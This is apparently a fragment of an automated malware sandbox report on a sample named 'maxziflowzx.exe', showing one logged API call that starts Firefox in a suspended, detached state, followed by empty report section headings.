CreateProcessInternalW Nov. 29, 2023, 2:27 p.m.	thread_identifier: 2064 thread_handle: 0x00000330 process_identifier: 2136 current_directory: filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: filepath_r: C:\Program Files\Mozilla Firefox\Firefox.exe stack_pivoted: 0 creation_flags: 12 (CREATE_SUSPENDED\|DETACHED_PROCESS) inherit_handles: 0 process_handle: 0x00000338	1	1

maxziflowzx.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All